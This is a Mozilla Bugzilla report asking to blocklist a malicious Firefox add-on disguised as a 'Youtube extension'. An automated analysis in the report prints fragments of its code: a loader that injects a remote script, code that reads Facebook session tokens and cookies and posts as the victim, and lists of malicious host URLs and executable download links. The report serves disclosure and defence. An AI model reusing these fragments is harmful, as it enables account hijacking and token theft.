Last Comment Bug 730399 - Malicious "Youtube" extension
: Malicious "Youtube" extension
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
: Jorge Villalobos [:jorgev]
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-02-24 11:36 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120223 nemanjan00.com.zip (1.55 MB, application/octet-stream)
2012-02-24 11:36 PST, MarkH
no flags Details

Description MarkH 2012-02-24 11:36:26 PST
Created attachment 600462 [details]
20120223 nemanjan00.com.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Via loading this URL in a browser:
http://hosting.muhammad-hasan[.]info/.fb.php?20560543

Wepawet analysis of the URL: http://wepawet.cs.ucsb.edu/view.php?hash=979b88bebb885ab1721297f33ee7e9cf&t=1330108668&type=js


Actual results:

Report for http://nemanjan00.com/odvale/youtube.xpi

** Embedded and Remote Files **

chrome.manifest
update.rdf
content/prefman.js
content/skin/icon.png
content/script-compiler.js
content/youtube.js
http://nemanjan00.com/odvale/fejs.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
install.rdf


** Embedded Metadata **

em:name="Youtube extension"
em:version="1.0.3"
em:creator="YOU"
em:iconURL="chrome://youtube/content/skin/icon.png"
em:description="Plays Youtube Videos Online, Quickly and Efficiently"
em:homepageURL="http://ludnica.uk.to/"
em:updateURL="http://ludnica.uk.to//update.rdf"
em:updateKey="MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDTrfS3V3OMNjIemPFkdJji5dGxg+...
<em:targetApplication RDF:resource="rdf:#$lSyBL"/>
em:minVersion="2.0"
em:maxVersion="10.*" />


** Files Loaded **

...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/script-com...
'chrome://youtube/content/youtube.js'
...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s...
em:iconURL="chrome://youtube/content/skin/icon.png"


** Remote Javascript Loaded **

...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul
<RDF:Description RDF:about="rdf:#$ZMugE2"
</RDF:Description>
<RDF:Description RDF:about="rdf:#$0NugE2"
<RDF:Description RDF:about="urn:mozilla:extension:youtube@youtube.com"
</RDF:Description>
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
loadScript_you();
function loadScript_you() {
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js");
//setTimeout('javascript:location.reload(true);', 10000)
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s...
<RDF:Description RDF:about="urn:mozilla:install-manifest"
em:description="Plays Youtube Videos Online, Quickly and Efficiently"
</RDF:Description>
<RDF:Description RDF:about="rdf:#$lSyBL"


** Facebook Paths Accessed **

...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook\.com/i)) {


** Facebook Cookies Accessed **

var fb_dtsg = Env.fb_dtsg;
if (document['getElementsByName']('fb_dtsg')[0] == null) return false;
fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
if (document['getElementsByName']('fb_dtsg')[0] == null) return false;
fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

<RDF:RDF xmlns:NS1="http://www.mozilla.org/2004/em-rdf#"
xmlns:NC="http://home.netscape.com/NC-rdf#"
xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
NS1:updateLink="http://ludnica.uk.to/youtube.xpi"
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
blogs[0] = 'http://hummerh2-razlupan.web44.net/?';
blogs[1] = 'http://hosting.muhammad-hasan.info/.fb.php?';
blogs[2] = 'http://kandangwebsite.com/1/.fb.php?';
blogs[3] = 'http://tienda.soydesantarosa.com/.fb.php?';
blogs[4] = 'http://www.odvale.tk/odvale.php?';
blogs[5] = 'http://odvale.us.to/?';
blogs[6] = 'http://nemanjan00.binhoster.com/?';
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
//window.location = "http://dl.dropbox.com/u/55258798/AntiSpam.exe";
... '<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loa...
//setTimeout('top.location=\'http://adf.ly/5b0tf\';', 10000)
...//setTimeout('top.location=\'http://dl.dropbox.com/u/55258798/Server/Downloader....
s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></...
...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/...
...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper...
<RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#"
xmlns:NC="http://home.netscape.com/NC-rdf#"
xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
em:homepageURL="http://ludnica.uk.to/"
em:updateURL="http://ludnica.uk.to//update.rdf"



Expected results:

It should not steal your Facebook cookies and post to Facebook as you with out your consent or knowledge.

This add-on is being served in conjunction with a Java exploit (see wepawet analysis above).
Comment 1 Jorge Villalobos [:jorgev] 2012-02-27 10:21:52 PST
Id: youtube@2youtube.com
Comment 2 Jorge Villalobos [:jorgev] 2012-02-27 10:24:03 PST
https://addons.mozilla.org/en-US/firefox/blocked/i71

Note You need to log in before you can comment on or make changes to this bug.